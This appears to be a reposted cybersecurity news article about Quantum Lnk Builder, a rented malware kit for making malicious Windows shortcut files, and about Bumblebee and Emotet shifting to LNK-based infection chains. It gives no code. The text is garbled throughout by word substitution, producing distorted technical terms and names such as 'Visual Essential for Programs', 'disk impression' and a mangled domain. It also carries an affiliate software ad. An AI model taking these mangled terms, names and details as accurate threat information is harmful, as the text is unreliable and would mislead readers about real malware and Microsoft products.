• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
new 'quantum' builder lets attackers easily create malicious windows shortcuts

New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts

You are here: Home / General Cyber Security News / New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts
June 24, 2022

A new malware software that allows cybercriminal actors to establish malicious Windows shortcut (.LNK) files has been noticed for sale on cybercrime boards.

Dubbed Quantum Lnk Builder, the software program tends to make it doable to spoof any extension and choose from more than 300 icons, not to point out assist UAC and Windows SmartScreen bypass as nicely as “numerous payloads per .LNK” file. Also available are abilities to create .HTA and disk impression (.ISO) payloads.

Quantum Builder is readily available for lease at different selling price points: €189 a month, €355 for two months, €899 for 6 months, or as a one-off life span purchase for €1,500.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


“.LNK documents are shortcut data files that reference other information, folders, or programs to open up them,” Cyble scientists stated in a report. “The [threat actor] leverages the .LNK documents and drops destructive payloads working with LOLBins [living-off-the-land binaries].”

Early evidence of malware samples employing Quantum Builder in the wild is said to date back to May perhaps 24, masquerading as harmless-seeking text documents (“exam.txt.lnk”).

“By default, Windows hides the .LNK extension, so if a file is named as file_name.txt.lnk, then only file_name.txt will be obvious to the consumer even if the show file extension solution is enabled,” the researchers said. “For this kind of reasons, this could be an interesting option for TAs, utilizing the .LNK information as a disguise or smokescreen.”

Launching the .LNK file executes PowerShell code that, in switch, runs a HTML application (“bdg.hta”) file hosted on Quantum’s web site (“quantum-software program[.]on line”) employing MSHTA, a legitimate Windows utility that’s utilized to operate HTA files.

Quantum Builder is stated to share ties with the North Korean-centered Lazarus Group primarily based on source code-level overlaps in the software and the latter’s modus operandi of leveraging .LNK files for delivering more phase payloads, indicating its prospective use by APT actors in their attacks.

CyberSecurity

The growth arrives as operators guiding Bumblebee and Emotet are shifting to .LNK information as a conduit to trigger the an infection chains following Microsoft’s conclusion to disable Visual Essential for Programs (VBA) macros by default across its products and solutions before this 12 months.

Bumblebee, a replacement for BazarLoader malware 1st noticed in March, features as a backdoor made to give the attackers persistent obtain to compromised systems and a downloader for other malware, which include Cobalt Strike and Sliver.

The malware’s abilities have also manufactured it a tool of choice for menace actors, with 413 incidents of Bumblebee an infection documented in May well 2022, up from 41 in April, in accordance to Cyble.

“Bumblebee is a new and extremely advanced malware loader that employs considerable evasive maneuvers and anti-examination methods, which includes complicated anti-virtualization approaches,” the researchers said. “It is very likely to come to be a well known instrument for ransomware groups to provide their payload.”

Identified this report intriguing? Adhere to THN on Fb, Twitter  and LinkedIn to browse more distinctive material we post.


Some elements of this posting are sourced from:
thehackernews.com

Previous Post: «log4shell still being exploited to hack vmware servers to exfiltrate Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data
Next Post: State-Backed Hackers Using Ransomware as a Decoy for Cyber Espionage Attacks state backed hackers using ransomware as a decoy for cyber espionage»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • New HTTPBot Botnet Launches 200+ Precision DDoS Attacks on Gaming and Tech Sectors
  • Top 10 Best Practices for Effective Data Protection
  • Researchers Expose New Intel CPU Flaws Enabling Memory Leaks and Spectre v2 Attacks
  • Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks
  • [Webinar] From Code to Cloud to SOC: Learn a Smarter Way to Defend Modern Applications
  • Meta to Train AI on E.U. User Data From May 27 Without Consent; Noyb Threatens Lawsuit
  • Coinbase Agents Bribed, Data of ~1% Users Leaked; $20M Extortion Attempt Fails
  • Pen Testing for Compliance Only? It’s Time to Change Your Approach
  • 5 BCDR Essentials for Effective Ransomware Defense
  • Russia-Linked APT28 Exploited MDaemon Zero-Day to Hack Government Webmail Servers

Copyright © TheCyberSecurity.News, All Rights Reserved.